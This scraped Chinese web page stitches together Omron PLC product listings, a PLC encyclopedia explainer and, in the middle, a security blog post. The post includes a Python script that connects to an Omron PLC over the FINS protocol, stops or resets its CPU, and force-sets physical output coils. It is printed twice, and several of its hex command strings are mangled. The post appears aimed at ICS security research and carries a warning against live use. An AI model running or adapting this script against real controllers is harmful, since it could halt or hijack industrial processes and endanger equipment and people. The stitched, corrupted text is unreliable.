来源:蜘蛛抓取(WebSpider)
时间:2011-10-19 03:10
标签:
omron plc视频教程
欧姆龙PLC-OMRON 以太网模块
经营模式:贸易型
所在地区:广东广州
免费会员商铺
广州菱控自动化设备有限公司
站内产品搜索
&&&&&&&&&&&&&
公司:广州菱控自动化设备有限公司
您可能感兴趣
产品分类展示:
产品名称/介绍
详细介绍:
OMRON欧姆龙 >> CJ1系列PLC >> 晶体管输出单元 >> 晶体管输出单元 CJ1W-OD231
OMRON欧姆龙晶体管输出单元CJ1W-OD231
输出点数:32点、漏型
额定电压:DC12~24V
最大负载电流:0.5A/点4A/单元
外部连接:富士通兼容连接器
详细介绍:
OMRON欧姆龙 >> CJ1系列PLC >> 位置控制单元 >> 位置控制单元 CJ1W-NC433
OMRON欧姆龙位置控制单元CJ1W-NC433
控制输出I/F:脉冲串集电极开路输出型
详细介绍:
OMRON欧姆龙 >> CJ1系列PLC >> 串行通信单元 >> 串行通信单元 CJ1W-SCU41-V1
OMRON欧姆龙串行通信单元CJ1W-SCU41-V1
使用CPU总线单元,一次增加两个串行端口,RS-232C或者RS422/485。
详细介绍:
OMRON欧姆龙 >> C200H系列PLC >> DeviceNet单元 >> DeviceNet单元 C200HW-DRM21-V1
OMRON欧姆龙DeviceNet单元C200HW-DRM21-V1
主站功能最大4,800点/主站控制
?远程I/O通信主站(固定或用户设定分配)
详细介绍:
OMRON欧姆龙 >> CJ1系列PLC >> 电源模块 >> AC电源模块 CJ1W-PA202
OMRON欧姆龙AC电源模块CJ1W-PA202
电源AC/DC:AC
电源电压:AC100~240V
DC5V输出容量:2.8A
DC24V输出容量:0.4A
总计消耗功率:14W
运行输出:无
更换通知功能:无
详细介绍:
OMRON欧姆龙 >> CJ1系列PLC >> 模拟量输出单元 >> 模拟量输出单元 CJ1W-DA08V
OMRON欧姆龙模拟量输出单元CJ1W-DA08V
输入点数:8点
信号范围选择:8点个别
详细介绍:
OMRON欧姆龙 >> PLC(可编程控制器) >> 中型PLC >> 摸拟量输入单元(C200H) C200H-AD003
OMRON欧姆龙(C200H)摸拟量输入单元C200H-AD003
模拟量输入单元用来将模拟信号如电压或电流转换成二进制数据输入PC。
详细介绍:
OMRON欧姆龙 >> CJ1系列PLC >> CPU单元(CJ1G/H) >> CPU单元 CJ1H-CPU66H
OMRON欧姆龙CPU单元CJ1H-CPU66H
种类:CJ1G/H CPU单元
I/O点数:2560点
最大构成单元台数:40台
最大扩展机架数:最多扩展3机架
详细介绍:
OMRON欧姆龙 >> C200H系列PLC >> 输出模块(晶体管) >> 晶体管输出模块 C200H-OD211
OMRON欧姆龙晶体管输出模块C200H-OD211
输出点数:12点、漏型
额定电压:DC24V
最大负载电流:0.3A
外部接线:拆卸端子块
详细介绍:
OMRON欧姆龙 >> PLC(可编程控制器) >> 中型PLC >> PLC-CPU单元 CQM1H-CPU51
OMRON欧姆龙CPU单元CQM1H-CPU51
CQM1H是一种功能完善的紧凑型PLC,它能用高速、高容量的ContrllerLink来建立分散控制系统。
免责声明:以上所展示的信息由企业自行提供,内容的真实性、准确性和合法性由发布企业负责。Goepe对此不承担任何保证责任。
广州菱控自动化设备有限公司
地址:广州市黄埔区大沙地东403号步东商业大厦A712
技术支持:&&&&&|&使用FINS协议攻击欧姆龙(Omron)PLC的物理(I/O)输出 – ICS Security Workspace
专注于工控安全攻防技术研究
提到对PLC的攻击往往除了PLC设备本身存在的缺陷和漏洞外,要实现对PLC内运行的逻辑在特定环境下达到特定的攻击演示效果,往往可以使用PLC支持的一些内部功能实现,这些功能可以通过PLC支持的通信协议完成构造并实现远程利用。
在今年的Kcon会场外设置的工控Hack的环节,我当时便设计了3种针对西门子S7-300 PLC内部逻辑程序或变量进行修改,从而达到特定目的和攻击效果的黑盒测试(),而本文则主要介绍了针对欧姆龙(Omron)PLC的一种黑盒攻击方式。
什么是PLC的I/O?
I/O即input和output的简写, PLC作为一种可编程的工业嵌入式计算机,它控制了大量的自动化生产过程,要实现对过程的控制,简单来说是用户通过编程对输入输出(I/O)模块信号的采集与控制实现的。PLC一般具有高度模块化,PLC可以非常方便的对I/O等卡件进行更换或增加。
欧姆龙FINS协议介绍
FINS协议是计算机与欧姆龙系列PLC之间进行通信的一种通信协议,FINS协议默认使用的以太网端口为9600,FINS协议可以以UDP或TCP模式运行,曾经我也对,协议的具体构造方式和命令字可以参照。
欧姆龙PLC的工作状态介绍
常见的欧姆龙PLC具有3种工作状态,即运行模式(RUN)、监视模式(MONITOR)、编程模式(PROGRAM)。
运行模式(RUN):PLC内用户的逻辑程序正常运行,并且不能对PLC进行置位和强制写入内存操作。
监视模式(MONITOR):PLC内用户的逻辑程序正常运行,可以置位和强制写入,也可以对I/O点和辅助继电器进行操作。可以在线修改程序。
编程模式(PROGRAM):PLC内用户的逻辑程序不运行。可以对内存进行清零(格式化)操作。经过测试强制写入依然生效,依然可以在编程模式下强制激活物理I/O输出端子。
使用强制I/O实现对物理输出端子的控制
在各个厂家的PLC中往往拥有一个强制I/O的功能,主要用于方便进行工程调试,所谓强制就是脱离用户逻辑程序的控制,强制设置后的内存变量将不会受用户的程序影响,强制状态不取消的情况下,变量值将保持不变。甚至有些厂家的PLC即使重新上电后强制值如果不手动取消,强制值依然不会丢失。强制功能在众多厂商的用户手册当中都被定义为注意操作事项,如果在实际环境中操作不当将会容易产生事故。
如下图,为定时输出给一个线圈开状态的简单程序,即时当前还处于定时器的运行过程中,使用强制功能也可以给出ON信号,将不会受程序影响。
实现一个攻击测试程序
根据欧姆龙PLC对物理I/O端子的地址定义,如下图。
为某型号开关量输出模块接线图和默认物理端子输出地址,那么可以使用FINS协议的命令集构建切换PLC CPU到监视模式的请求报文,然后批量或循环强制写内存变量CIO100.00到一定范围的测试用例。这样就可以轻松达到针对物理输出的远程控制。如下图,为由强制开,接管流水灯逻辑,原逻辑虽然运行但是物理输出依然为原强制的状态,欧姆龙PLC CPU自带的开关量输出端子全部被置ON激活。
注意!!! 不要运行在真实和在线的控制系统!!!这将导致系统停机和异常!!!
import sys, socket, binascii, time, re
# ICS Security Workspace(plcscan.org)
# Author:Z-0ne
# Warning:will affect the real plc system operation!!!
# Func:Forced set CIO data and Control CPU
def send_receive(s,size,strdata):
senddata = binascii.unhexlify(strdata)
s.send(senddata)
resp = s.recv(1024)
return resp
except socket.timeout:
print 'send commad but no respone'
except socket.error:
print 'err'
def validata(ip):
ipdata = re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', ip)
if not ipdata:
return False
return True
def initconnect(s):
init_address = send_receive(s,e')
if len(init_address) & 23:
address_code = binascii.b2a_hex(init_address[23])
print 'len err'
getinfo = send_receive(s,e' + address_code + '050100')
print "Controller Model:" + getinfo[30:67]
def run_plc_cpu(s):
send_receive(s,e01ffff')
def run_monitor_cpu(s):
send_receive(s,e00c010000')
def stop_plc_cpu(s):
send_receive(s,e02ffff')
def reset_plc_cpu(s):
send_receive(s,e03ffff')
def loop_forced_set(s,iostate):
if iostate == 'on':
coil_state_code = '01'
print 'Forced set on'
elif iostate == 'off':
coil_state_code = '00'
print 'Forced set off'
print 'Forced set on'
coil_state_code = '01'
#(to forced set CIO default physical output address(start at 100.00)
for i in range(int(0),int(101)):
print 'set default physical output at CIO out 100.%s' %(i)
send_receive(s,e' + coil_state_code + '3000' + '64' + "%02x"%(i))
def cancel_forced_set(s):
send_receive(s,e02')
raw_input('Warning:will affect the real system operation!!!Enter to continue!!!')
if not len(sys.argv) == 2:
ip = raw_input('Target PLC IP:')
ip = sys.argv[1]
if not validata(ip):
print 'err'
sys.exit()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# no respone timeout
s.settimeout(3)
s.connect((ip,9600))
print 'connect to the plc device.....'
print 'start read device information.....'
initconnect(s)
while True:
func = raw_input('Func(run/monitor/stop/reset/quit):')
iostate = raw_input('Set Forced State(on/off/cancel/quit):')
if func == 'run':
run_plc_cpu(s)
elif func == 'monitor':
run_monitor_cpu(s)
elif func == 'stop':
stop_plc_cpu(s)
elif func == 'reset':
reset_plc_cpu(s)
elif func == 'quit':
print 'input func'
print 'input err1'
if iostate == 'on':
loop_forced_set(s,iostate)
elif iostate == 'off':
loop_forced_set(s,iostate)
elif iostate == 'cancel':
cancel_forced_set(s)
elif iostate == 'quit':
print 'input state'
'input err2'
if raw_input('exit:') == 'exit':
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798
import sys, socket, binascii, time, re## ICS Security Workspace(plcscan.org)# Author:Z-0ne# Warning:will affect the real plc system operation!!!## Func:Forced set CIO data and Control CPU#def send_receive(s,size,strdata):&&&&senddata = binascii.unhexlify(strdata)&&&&s.send(senddata)&&&&try:&&&&&&&&resp = s.recv(1024)&&&&&&&&return resp&&&&except socket.timeout:&&&&&&&&print 'send commad but no respone'&&&&except socket.error:&&&&&&&&print 'err'def validata(ip):&&&&ipdata = re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', ip)&&&&if not ipdata:&&&&&&&&return False&&&&return Truedef initconnect(s):&&&&init_address = send_receive(s,1024,'000c')&&&&if len(init_address) & 23: &&&&&&&&address_code = binascii.b2a_hex(init_address[23])&&&&else:&&&&&&&&print 'len err'&&&&getinfo = send_receive(s,1024,'0200' + address_code + '050100')&&&&print "Controller Model:" + getinfo[30:67]def run_plc_cpu(s):&&&&send_receive(s,1024,'fbffff')def run_monitor_cpu(s):&&&&send_receive(s,1024,'00a')def stop_plc_cpu(s):&&&&send_receive(s,1024,'fbffff')def reset_plc_cpu(s):&&&&send_receive(s,1024,'fbffff')def loop_forced_set(s,iostate):&&&&if iostate == 'on':&&&&&&&&coil_state_code = '01'&&&&&&&&print 'Forced set on'&&&&elif iostate == 'off':&&&&&&&&coil_state_code = '00'&&&&&&&&print 'Forced set off'&&&&else:&&&&&&&&print 'Forced set on'&&&&&&&&coil_state_code = '01'&&&&&&&&#(to forced set CIO default physical output address(start at 100.00)&&&&for i in range(int(0),int(101)):&&&&&&&&print 'set default physical output at CIO out 100.%s' %(i)&&&&&&&&send_receive(s,1024,'001c7e' + coil_state_code + '3000' + '64' + "%02x"%(i))def cancel_forced_set(s):&&&&send_receive(s,1024,'fb')raw_input('Warning:will affect the real system operation!!!Enter to continue!!!')if not len(sys.argv) == 2:&&&&ip = raw_input('Target PLC IP:')else:&&&&ip = sys.argv[1]if not validata(ip):&&&&print 'err'&&&&sys.exit()s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)# no respone timeouts.settimeout(3)s.connect((ip,9600))print 'connect to the plc device.....'print 'start read device information.....'initconnect(s)while True:&&&&func = raw_input('Func(run/monitor/stop/reset/quit):')&&&&iostate = raw_input('Set Forced State(on/off/cancel/quit):')&&&&if func == 'run':&&&&&&&&run_plc_cpu(s)&&&&elif func == 'monitor':&&&&&&&&run_monitor_cpu(s)&&&&elif func == 'stop':&&&&&&&&stop_plc_cpu(s)&&&&elif func == 'reset':&&&&&&&&reset_plc_cpu(s)&&&&elif func == 'quit':&&&&&&&&print 'input func'&&&&else:&&&&&&&&print 'input err1'&&&&if iostate == 'on':&&&&&&&&loop_forced_set(s,iostate)&&&&elif iostate == 'off':&&&&&&&&loop_forced_set(s,iostate)&&&&elif iostate == 'cancel':&&&&&&&&cancel_forced_set(s)&&&&elif iostate == 'quit':&&&&&&&&print 'input state'&&&&else:&&&&&&&&'input err2'&&&&if raw_input('exit:') == 'exit':&&&&&&&&s.close()&&&&&&&&break
欧姆龙PLC流水灯程序样例下载
Administrator
Posts by Z-0ne
2015年十一月
91112131415
16171819202122
232425272829
& 2017 . Theme by .OMRONPLC模块
共找到447695条商品信息
CJ1W-PA205R
产品认证:
工作电压:
AC100-240(V)
输出频率:
50/60(kHz)
加工定制:
广东省 东莞市
CS1W-GPI01
产品认证:
工作电压:
DC24/AC220(V)
输出频率:
50/60(kHz)
广东省 广州市
C200H-LK201-V1
产品认证:
工作电压:
DC24/AC220(V)
输出频率:
50/60(kHz)
加工定制:
广东省 广州市
CQMCPMCJ1W
加工定制:
CJ1W-NCF81
产品认证:
工作电压:
DC24/AC220(V)
输出频率:
50/60(kHz)
加工定制:
广东省 广州市
CJ1W-PA202
产品认证:
工作电压:
AC100-240(V)
输出频率:
标准(kHz)
加工定制:
C200H-IP007
加工定制:
材料物理性质:
材料晶体结构:
制作工艺:
输出信号:
广东省 深圳市
CVM1D-PA208
产品认证:
工作电压:
DC24/AC220(V)
输出频率:
50/60(kHz)
加工定制:
广东省 广州市
CS1W-OC201
加工定制:
工作电压:
湖南欧姆龙plc(V)
输出频率:
湖南欧姆龙指定代理(kHz)
产品认证:
欧姆龙plc CS1W-OC201
广东省 深圳市
C200H-OC224
产品认证:
加工定制:
广东省 深圳市
其他/other
广东省 东莞市
96mm*62mm*25mm
加工定制:
建议零售价:
适用范围:
广东省 广州市
PE294B1250
产品认证:
产品认证:
可控硅调光电源
计量单位:
频率范围:
广东省 中山市
sn99.3cuo.7
产品认证:
工作温度:
频率范围:
输出电流:
广东省 深圳市
2500.00/台
QC-1000A汽车启动电源
产品认证:
详见说明书
频率范围:
详见说明书
输出电流:
详见说明书
输出电压:
输出功率:
详见说明书
计量单位:
河南省 郑州市
产品认证:
天花灯电源
频率范围:
输出电流:
输出电压:
调制方式:
脉冲宽度调制(PWM)式
广东省 深圳市
产品认证:
频率范围:
输出电流:
输出电压:
输出功率:
计量单位:
广东省 深圳市
频率范围:
50/60(Hz)
输出电流:
输出电压:
20-43(V)
输出功率:
广东省 深圳市
产品等级:
产品认证:
山东省 济宁市
产品认证:
额定电压:
山东省 德州市
2000.00/个
IPA16-30LA
输出电流:
输出电压:
IPA16-30LA
加工定制:
上海 嘉定区
23000.00/套
产品认证:
离子源及电源
输出电流:
输出电压:
阴极40V阳极300V
广东省 佛山市
4600.00/台
RIGOL/普源
加工定制:
数字示波器
100(MHz)
广东省 东莞市
计量单位:
输出电流:
输出电压:
输出功率:
输入电压:
晶体管连接方式:
工作效率:
广东省 深圳市
产品认证:
整体节能灯应急电源
频率范围:
输出电流:
输出电压:
安徽省 滁州市
产品认证:
输出电流:
输出电压:
输出功率:
穿越机专用
广东省 深圳市
产品认证:
频率范围:
输出电流:
输出电压:
输出功率:
浙江省 湖州市
频率范围:
48-62(HZ)
输出电流:
输出电压:
输出功率:
广东省 深圳市
加工定制:
浙江省 温州市
88888.00/台
产品认证:
输入电压:
加工定制:
北京 海淀区
8888.00/立方
产品等级:
产品认证:
额定电压:
广东省 汕头市
SYSY20-24S5
输出电流:
输出电压:
输出功率:
输入电压:
北京 海淀区
适用范围:
浙江省 宁波市
1350.00/台
加工定制:
广东省 深圳市
1050.00/台
RXN-3010D-Ⅱ
线性稳压电源
计量单位:
频率范围:
输出电流:
0-10A(A)
输出电压:
0-30V(V)
广东省 东莞市
特色服务:
可咨询拿样
广东省 广州市
本页是慧聪网为您提供的OMRONPLC模块最新供应商、经销商、厂家,包括OMRONPLC模块的参数、型号、图片、价格等信息,为您提供全面的OMRONPLC模块参考信息和在线洽谈的机会,找OMRONPLC模块供应信息尽在慧聪网。
OMRONPLC模块其他产品
OMRONPLC模块相关行业
OMRONPLC模块最新产品
按字母分类 :
版权所有 慧聪网
通用网址:hc360
互联网药品信息服务资格证书:(京)-经营性- 海淀公安局网络备案编号:
Copyright?2000-. All Rights Reserved> Plc是什么
——Plc定义 在国际电工委员会(IEC)的标准中,可编程逻辑控制器(Programmable Logic Controller,简称)的定义为:可编程逻辑控制器是一种数字运算操作的电子系统,专为在工业环境应用而设计。它采用一类可编程的存储器,用于其内部存储程序,执行逻辑运算、顺序控制、定时、计数与算术操作等面向用户的指令,并通过数字或模拟式输入/输出控制各种类型的机械或生产过程。可编程逻辑控制器及其有关外部设备,都按易于与工业控制系统联成一个整体,易于扩充其功能的原则进行设计。本文引用地址: 最初的可编程逻辑控制器只有电路逻辑控制的功能,所以被命名为可编程逻辑控制器,后来随着不断的发展,这些当初功能简单的计算机模块已经有了包括逻辑控制,时序控制、模拟控制、多机通信等许多的功能,名称也改为可编程控制器(Programmable Controller),但是由于它的简写也是PC与个人电脑(Personal Computer)的简写相冲突,也由于多年来的使用习惯,人们还是经常使用可编程逻辑控制器这一称呼,并在术语中仍沿用这一缩写。 在可编程逻辑控制器出现之前,一般要使用成百上千的继电器以及计数器才能组成具有相同功能的自动化系统,而现在,经过编程的简单的可编程逻辑控制器模块基本上已经代替了这些大型装置。可编程逻辑控制器的系统程序一般在出厂前已经初始化完毕,用户可以根据自己的需要自行编辑相应的用户程序来满足不同的自动化生产要求。 现在工业上使用可编程逻辑控制器已经相当接近于一台轻巧型电脑所构成,甚至已经出现整合个人电脑(采用嵌入式操作系统)与结合架构的可编程自动化控制器(Programmable Automation Controller,简称PAC),能透过数字或模拟输入/输出模组控制机器设备、制造处理流程、及其它控制模组的电子系统。可编程逻辑控制器广泛应用于目前的工业控制领域。在工业控制领域中,PLC控制技术的应用已成为工业界不可或缺的一员。 图1:常见的可编程逻辑控制器外观——发展历史 常见的可编程逻辑控制器外观可编程控制器的兴起与美国现代工业自动化生产发展的要求密不可分的。PLC源起于1960年代,当时美国通用汽车公司,为解决工厂生产线调整时,继电器顺序控制系统之电路修改耗时,平时检修与维护不易等问题。在可编程逻辑控制器出现之前,汽车制造业中的一般控制、顺序控制以及安全互锁逻辑控制必须完全依靠众多的继电器、定时器以及专门的闭回路控制器来实现。它们体积庞大、有着严重的噪音,不但每年的维护工作要耗费大量的人力物力,而且继电器-接触器系统的排线检修等工作对维护人员的熟练度也有着很高的要求。 针对这些问题,美国通用汽车公司在1968年向社会公开招标,要求设计一种新的系统来替换继电器系统,并提出了著名的“通用十条”招标指标。随后,美国数字设备公司(DEC)根据这一设想,于1969年研制成功了第一台PDP-14控制器,并在汽车自动装配线上使用并获得成功。由于当时系统主要用于顺序控制、只能进行逻辑运算,所以被命名为可编程逻辑控制器(PLC)。最早期的PLC只具有简易的逻辑开/关(on/off)功能,但比起传统继电器控制方式,已具有容易修改、安装、诊断与不占空间等优点。 1970年代初期,PLC引进微处理机技术,使得PLC具有算术运算功能与多比特之数字信号输出/输入功能,并且能直接以阶梯图符号进行程序编写。这项新技术的使用,在工业界产生了巨大的反响。日本在1971年从美国引进了这项技术,并很快研制成功了自己的DCS-8可编程逻辑控制器,德、法在1973年至1974年间也相继有了自己的该项技术。中国则于1977年研制成功自己的第一台可编程逻辑控制器,但是使用的微处理器核心为MC1年代中期,PLC功能加入远距通讯、模拟输出输入、NC 伺服控制等技术。1980年代以后更引进PLC高速通讯网络功能,同时加入一些特殊输出/输入界面、人机界面、高功能函数指令、资料收集与分析能力等功能。 PLC功能早已不止当初数字逻辑之运算功能,因此近年来PLC常简称为可编程控制器(Programmable Controller)。——PLC内部运作方式 虽然PLC所使用的流程图程序中往往使用到许多继电器、计时器与计数器等,但PLC内部并非实体上具有这些硬件,而是以内存与程序编程方式做逻辑控制,并借由输出元件连接外部机械装置做实体控制。因此能大大减少控制器所需硬件空间。实际上PLC执行流程图程序的运作方式是逐行的先将程序码以扫描方式读入CPU中并最后执行控制运作。整个扫描过程包括三大步骤“输入状态检查”、“程序执行”、“输出状态更新”,具体说明如下: 图2:PLC内部运作架构 步骤一“输入状态检查”: PLC首先检查输入端元件所连接各点开关或传感器状态(1或0代表开或关),并将其状态写入内存中对应位置Xn。 步骤二“程序执行”: 将阶梯图程序逐行取入CPU中运算,若程序执行中需要输入接点状态,CPU直接自内存中查询取出。输出线圈之运算结果则存入内存中对应位置,暂不反应至输出端Yn。 步骤三“输出状态更新”: 将步骤二中之输出状态更新至PLC输出部接点,并且重回步骤一。 此三步骤称为PLC扫描周期,而完成所需的时间称为PLC反应时间,PLC输入信号时间若小于反应时间,则有误读的可能性。每次程序执行后与下一次程序执行前,输出与输入状态会被更新一次,因此称此种运作方式为输出输入端“程序结束再生”。Plc是什么——硬件结构: 可编程逻辑控制器硬件构成一般分为箱体式和模组式两种。但它们的组成是相同的,对箱体式PLC,有一块CPU板、I/O板、显示面板、内存块、电源等,当然按CPU性能分成若干型号,并按I/O点数又有若干规格。对模组式PLC,有CPU模组、I/O模组、内存、电源模组、底板或机架。无论哪种结构类型的PLC,都属于总线式开放型结构,其I/O能力可按用户需要进行扩展与组合。PLC的基本结构框图如下: 图3:可编程逻辑控制器硬件构成 图4:可编程逻辑控制器功能概况 1,电源模组: 有些PLC中的电源是与CPU模组合二为一的,但有些是分开的,其主要用途是为PLC各模组的集成电路提供工作电源,同时有的电源还为输入电路提供24V的工作电源。电源如果为交流电源通常为220VAC或110VAC,若为直流电源常用的为24V。 2,中央处理单元: CPU是PLC的核心,它按PLC的系统程序赋予的功能接收并存贮用户程序和资料,用扫描的方式采集由现场输入装置送来的状态或资料,并存入规划的暂存器中,同时,诊断电源和PLC内部电路的工作状态和编程过程中的语法错误等。进入运行后,从用户程序存贮器中逐条读取指令,经分析后再按指令规定的任务产生相应的控制信号,去指挥有关的控制电路,与个人电脑一样,主要由运算器、控制器、寄存器及实现它们之间联系的资料、控制及状态总线构成,还有周边芯片、总线界面及有关电路。它确定了进行控制的规模、工作速度、内存容量等。 3,内存: 内存主要用于存储程序及资料,是PLC不可缺少的组成单元。PLC内部会存放撰写完成编辑的程序指令及资料,通常也可使用RAM或EEPROM等专用内存卡片方式扩充,但扩充能力得依各厂牌与型号有所不同。 4,输入/输出单元: PLC的对外功能主要是通过各种输入/输出模组实现与外界联系的,按I/O点数确定模组规格及数量,I/O模组可多可少,但其最大数量受CPU所能管理的基本配置的能力,即受最大的底板或机架槽数限制。I/O模组集成了PLC的I/O电路,其输入暂存器反映输入信号状态,输出点反映输出锁存器状态。 输入单元是用来连结撷取输入元件的信号动作并透过内部总线将资料送进内存由CPU处理驱动程序指令部分。 输出单元是用来驱动外部负载的接口,主要原理是由CPU处理PLC内的程序指令,判断驱动输出单元进而控制外部负载,如指示灯、电磁接触器、继电器、气(油)压阀等。 5,通讯: 现在PLC大多具有可扩充通信网络模组的功能,简单的PLC以BUS缆线或方式进行通信,较高级的PLC会采用USB或以太网通信。它使PLC与PLC之间、PLC与个人电脑以及其他智慧设备之间能够交换信息,形成一个统一整体,实现分散集中控制。现在几乎所有的PLC新产品都有通信网络功能,它和电脑一样具有接口,通过双绞线、同轴电缆或光缆,可以在几公里甚至几十公里的范围内交换信息。PLC通讯协定标准可分为、RS-422、RS-432、RS-485、IEEE 1394、IEEE-488(GPIB)。Plc是什么——外部设备 外部设备是PLC系统不可分割的一部分,它有四大类: 1, 编程设备: 有简易编程器和智慧图形编程器,用于编程、对系统作一些设定、监控PLC及PLC所控制的系统的工作状况。编程器是PLC开发应用、监测运行、检查维护不可缺少的器件,但它不直接参与现场控制运行。 2,监控设备:资料监视器和图形监视器。直接监视资料或通过画面监视资料。 3,存储设备:有存储卡、存储磁带、软碟或只读存储器,用于永久性地存储用户资料,使用户程序不丢失,如EPROM、EEPROM写入器等。 4,输入输出设备:用于接收信号或输出信号,一般有条码读入器,输入模拟量的电位器,打印机等。Plc是什么——程序设计 PLC的编程语言与一般电脑编程语言相比,既不同于高阶语言,也不同于一般的组合语言,而是既要满足易于编写,又要满足易于调试的要求。目前,还没有一种编程语言对各厂家产品都能相容。IEC 61131-3是一个国际标准,它规范了PLC相关的软硬件标准,让使用者在不更改软件设计的情况下可以轻易更换PLC硬件。IEC 61131-3主要提供了五种编程语言,包含: 1. 指令表(Instruction List,IL或Statement List,SL): 类似组合语言的描述文字。由指令语句系列构成,如Mitsubishi FX2的控制指令LD、LDI、AND、ANI、OR、ORI、ANB、ORB、MMP、MMS与OUT等,一般配合书写器写入程序,而书写器只能输入简单的指令,与电脑程序中的阶梯图比较起来简单许多。书写器不太直观,可读性差,特别是遇到较复杂的程序,更难读;但其优点就是不需要电脑就可以更改或察看PLC内部程序。使用书写器时,必须注意的是PLC指令中输出有优先次序,其中若有输出至相同的单元时(如Y000),输出的优先次序以位址越大优先次愈越高,一般不容易从书写器中察觉所输入的单元。 2. 结构式文件编程语言(Structured Text,ST): 类似PASCAL与C语言的语法,适合撰写较复杂的算法,除错上也比阶梯图要容易得多。ST语言类似于编程语言的特性,因此可利用与微电脑及个人电脑相同的程序设计技术进行阶梯式语言所难以执行的复杂计算,完成程序的建立。 3. 阶梯图(Ladder Programming,LAD):类似于传统上以继电器控制接触器的阶梯图,梯形图是通过连线把PLC指令的梯形图符号连接在一起的连通图,用以表达所使用的PLC指令及其前后顺序,它与电气原理图很相似。 它的连线有两种:一为母线,另一为内部横竖线。内部横竖线把一个个梯形图符号指令连成一个指令组,这个指令组一般总是从装载(LD)指令开始,必要时再继以若干个输入指令(含LD指令),以建立逻辑条件。最后为输出类指令,实现输出控制,或为资料控制、流程控制、通讯处理、监控工作等指令,以进行相应的工作。 4. 顺序功能流程图(Sequential Function Chart,SFC): 类似于流程设计(Flow Design),流程图中的步骤组合而完成,主要是规划动作顺序的流程图,故谓之顺序功能流程图。所谓步序式控制,即是一步一步控制,而这一步与上一步是有关连性的,有顺序性的。必须有上一个动作(STL),才会启动(SET)下一个动作(STL)。 5.功能图(Function Chart Programming,FBD):以画电路图的方式来写PLC程序。常用的程序及回路可透过FB(功能区块)的建立轻易地重复利用。 图5:PLC程序设计示意图 其他一些高档的PLC还具有与电脑相容的C语言、BASIC语言、专用的高阶语言(如西门子公司的GRAPH5、三菱公司的MELSAP、富士电机的Micrex-SX系列),还有用布尔逻辑语言、通用电脑相容的组合语言等。Plc是什么——特性 PLC具有通用性强、使用方便、适应面广、可靠性高、抗干扰能力强、编程简单等特点。美国通用汽车公司在1968年提出了著名的“通用十条”招标指标,也是目前PLC的特点: 1.编程方便,现场可修改程序; 2.维修方便,采用模块化结构; 3.可靠性高于继电器控制装置; 4.体积小于继电器控制装置; 5.数据可直接送入计算机; 6.成本可与继电器控制装置竞争; 7.输入可以是交流115V; 8.输出为交流115V,2A以上,能直接驱动电磁阀,接触器等; 9.在扩展时,原系统只要很小变更; 10.用户程序存储器容量能扩展。Plc是什么——与单片机的区别: 1.PLC的核心控制器采用单片机,是建立在单片机之上的产品,单片机是一种集成电路,两者不具有可比性。 2.单片机可以构成各种各样的应用系统,从微型、小型到中型、大型都可,PLC是单片机应用系统的一个特例。 3.不同厂家的PLC有相同的工作原理,类似的功能和指标,有一定的互换性,质量有保证,编程软件正朝标准化方向迈进。这正是PLC获得广泛应用的基础。而单片机应用系统则是八仙过海,各显神通,功能千差万别,质量参差不齐,学习、使用和维护都很困难。 从工程的角度,PLC与单片机系统的选用原则也是不同的: 1.对单项工程或重复数极少的项目,采用PLC方案是明智、快捷的途径,成功率高,可靠性好,但成本较高。 2.对于量大的配套项目,采用单片机系统具有成本低、效益高的优点,但这要有相当的研发力量和行业经验。最好的方法是单片机系统嵌入PLC的功能,这样可大大简化单片机系统的研制时间,性能得到保障,效益也就有保证。Plc是什么——PLC、DCS、FCS三大控制系统的特点和差异 1,PLC (1)从开关量控制发展到顺序控制、运送处理,是从下往上的。 (2)连续PID控制等多功能,PID在中断站中。 (3)可用一台PC机为主站,多台同型PLC为从站。 (4)也可一台PLC为主站,多台同型PLC为从站,构成PLC网络。这比用PC机作主站方便之处是:有用户编程时,不必知道通信协议,只要按说明书格式写就行。 (5)PLC网格既可作为独立DCS/TDCS,也可作为DCS/TDCS的子系统。 (6)大系统同DCS/TDCS,如TDC3000、CENTUMCS、WDPFI、MOD300。 (7)PLC网络如Siemens公司的SINEC—L1、SINEC—H1、S4(错了,去掉)、S5、S6(错了,去掉)、S7等,GE公司的GENET、三菱公司的MELSEC—NET、MELSEC—NET/MINI。 (8)主要用于工业过程中的顺序控制,新型PLC也兼有闭环控制功能。 (9)制造商:GOULD(美)、AB(美)、GE(美)、OMRON(日)、MITSUBISHI(日)、Siemens(德)等。 2,DCS或TDCS (1)分散控制系统DCS与集散控制系统TDCS是集4C(Communication,Computer, Control、CRT)技术于一身的监控技术。 (2)从上到下的树状拓扑大系统,其中通信(Communication)是关键。 (3)PID在中断站中,中断站联接计算机与现场仪器仪表与控制装置。 (4)是树状拓扑和并行连续的链路结构,也有大量电缆从中继站并行到现场仪器仪表。 (5)模拟信号,A/D—D/A、带微处理器的混合。 (6)一台仪表一对线接到I/O,由控制站挂到局域网LAN。 (7)DCS是控制(工程师站)、操作(操作员站)、现场仪表(现场测控站)的3级结构。 (8)缺点是成本高,各公司产品不能互换,不能互操作,大DCS系统是各家不同的。 (9)用于大规模的连续过程控制,如石化等。 (10)制造商:Bailey(美)、Westinghous(美)、HITACH(日)、LEEDS NORTHRMP(美)、SIEMENS(德)、Foxboro(美)、ABB(瑞士)、Hartmann Braun(德)、Yokogawa(日)、Honewell(美国)、Taylor(美)等。 3,FCS (1)基本任务是:本质(本征)安全、危险区域、易变过程、难于对付的非常环境。 (2)全数字化、智能、多功能取代模拟式单功能仪器、仪表、控制装置。 (3)用两根线联接分散的现场仪表、控制装置、PID与控制中心,取代每台仪器两根线。 (4)在总线上PID与仪器、仪表、控制装置都是平等的。 (5)多变量、多节点、串行、数字通信系统取代单变量、单点、并行、模拟系统。 (6)是互联的、双向的、开放的取代单向的、封闭的。 (7)用分散的虚拟控制站取代集中的控制站。 (8)由现场电脑操纵,还可挂到上位机,接同一总线的上一级计算机。 (9)局域网,再可与internet相通。 (10)改变传统的信号标准、通信标准和系统标准入企业管理网。 (11)制造商:美Honeywell 、Smar 、Fisher— Rosemount、AB/Rockwell、Elsag— Bailey 、Foxboro 、Yamatake 、日Yokogawa、欧Siemens、 GEC—Alsthom 、Schneider、 proces—Data、 ABB等。 (12)3类FCS的典型 1)连续的工艺过程自动控制如石油化工,其中“本安防爆”技术是绝对重要的,典型产品是FF、WorldFIP、Profibus—PA; 